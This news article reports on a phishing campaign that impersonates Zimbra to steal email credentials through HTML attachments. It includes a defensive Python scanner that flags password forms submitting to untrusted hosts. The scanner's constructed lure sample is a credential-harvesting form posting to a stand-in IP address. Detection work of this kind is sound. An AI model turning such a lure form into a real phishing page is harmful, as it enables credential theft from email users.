A widespread phishing campaign targeting customers of the Zimbra Collaboration software suite has become a notable concern as it continues to impact hundreds of organizations across multiple countries. Zimbra, known for its collaborative software suite that includes an email server and web client, has a smaller market share compared to traditional enterprise email solutions, according to industry statistics from Enlyft and 6sense.
Throughout the year, Zimbra has faced several security incidents. These include a remote code execution bug, a cross-site scripting zero-day, and an infostealing campaign orchestrated by North Korea. These incidents have raised alarms about the platform’s vulnerability to attacks and the potential risks faced by its users.
However, the latest phishing campaign has brought new challenges for Zimbra customers. ESET researchers have discovered that an unidentified threat actor has been conducting a scattershot phishing campaign since April 2023. The primary targets of these attacks have been small-to-midsize businesses, which make up Zimbra's core customer base. Surprisingly, government organizations have also fallen victim to this campaign.
Anton Cherepanov, ESET’s senior malware researcher, has revealed that “hundreds of different organizations were targeted by this campaign.” However, the extent of the damage caused remains uncertain due to the timely detection and prevention of most attacks.
The phishing attacks follow a general pattern. The threat actor impersonates Zimbra itself and sends out urgent phishing emails to users. The emails may claim to be related to a server update or account deactivation, aiming to create a sense of urgency and compel recipients to take immediate action. For instance, one of the phishing emails is titled “Important information from Zimbra Security Service” and provides instructions to download an attachment to prevent email account deactivation.
The attached HTML file redirects users to a seemingly legitimate Zimbra login page, where users are prompted to enter their credentials. Unbeknownst to the users, these credentials are then transmitted to the attackers. By obtaining such sensitive information, the attackers can potentially gain unauthorized access to Zimbra accounts, and in the worst-case scenario, even escalate their privileges to gain control over the entire server.
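One defensive check that follows from the mechanics described above is to scan HTML attachments for a login form that carries a password field but submits somewhere other than the organization's real Zimbra host. The following is an added example, not code from ESET or Zimbra; the trusted host name and both sample attachments are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_HOSTS = {"mail.example.org"}  # assumption: the org's real Zimbra web client


class _FormScanner(HTMLParser):
    """Record each <form>'s action URL and whether it contains a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []        # entries: [action, has_password]
        self._current = None   # index of the currently open form, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append([a.get("action") or "", False])
            self._current = len(self.forms) - 1
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self._current is not None:
                self.forms[self._current][1] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html, trusted=TRUSTED_HOSTS):
    """Return action URLs of password forms that submit outside the trusted hosts."""
    scanner = _FormScanner()
    scanner.feed(html)
    hits = []
    for action, has_password in scanner.forms:
        if not has_password:
            continue
        host = urlparse(action).hostname
        # A relative action posts back to wherever the file was opened from, which
        # for a locally opened attachment is not the trusted server either.
        if host is None or host.lower() not in trusted:
            hits.append(action)
    return hits


# Constructed samples: a lure in the style the article describes, and a benign page.
LURE = ('<html><body><h1>Zimbra Security Service</h1>'
        '<form action="https://203.0.113.10/collect.php" method="post">'
        '<input name="user"><input type="password" name="pass"></form></body></html>')
BENIGN = ('<form action="https://mail.example.org/" method="post">'
          '<input type="password" name="password"></form>')
```

A lure that assembles its form with JavaScript or submits via fetch() contains no static form to inspect, so this check is one signal to combine with attachment-type policy rather than a complete filter.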
The impact of this campaign has been felt globally, with Poland being the most affected country, followed by Ecuador and Italy. Additionally, attacks have been reported in other countries such as Mexico, Kazakhstan, and the Netherlands. The affected organizations share a common thread—they all rely on Zimbra’s services.
To mitigate the risks associated with this phishing campaign, Cherepanov emphasizes the importance of adhering to standard security practices. Utilizing strong passwords, implementing multi-factor authentication, and ensuring the usage of the most up-to-date version of Zimbra are crucial steps to prevent compromise.
As Zimbra continues to grapple with security incidents and tackle the aftermath of this phishing campaign, it is crucial for users to remain vigilant and take proactive measures to protect themselves and their organizations from falling victim to such attacks. Heightened security awareness, regular software updates, and robust cybersecurity protocols are essential to safeguard against phishing attempts and maintain the integrity of sensitive information.